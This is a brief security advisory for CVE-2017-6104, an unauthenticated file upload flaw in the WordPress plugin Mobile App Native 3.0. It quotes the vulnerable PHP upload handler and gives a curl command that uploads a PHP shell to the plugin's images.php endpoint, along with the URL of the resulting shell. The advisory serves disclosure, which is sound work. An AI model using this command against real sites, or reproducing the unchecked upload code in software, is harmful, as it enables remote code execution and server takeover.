WordPress Mobile App Native 3.0 Shell Upload

`Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0  
Vulnerability Date: 2017-02-27  
Download: https://wordpress.org/plugins/zen-mobile-app-native/  
Vendor: https://profiles.wordpress.org/zendkmobileapp/  
Notified: 2017-02-27  
Vendor Contact:   
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder.  
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content.  
It also doesn't sanitize the file upload against executable code.  
  
<?php  
//header('content-type: text/html; charset=iso-8859-2');  
header('Content-Type: text/html; charset=utf-8');  
header('Access-Control-Allow-Origin: *');  
require_once('function.php');  
  
if ($_FILES['file']['name']) {  
if (!$_FILES['file']['error']) {  
$name = md5(rand(100, 200));  
$ext = explode('.', $_FILES['file']['name']);  
$filename = $name . '.' . $ext[1];  
$destination = 'images/' . $filename;  
$location = $_FILES["file"]["tmp_name"];  
move_uploaded_file($location, $destination);  
echo $plugin_url.'/server/images/' . $filename;  
}  
else {  
echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error'];  
}  
}  
CVEIDs: CVE-2017-6104  
Exploit: $   
curl -F "file=@/var/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php"  
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php  
  
URL: http://www.vapidlabs.com/advisory.php?v=178  
Credit: Larry W. Cashdollar, @_larry0  
`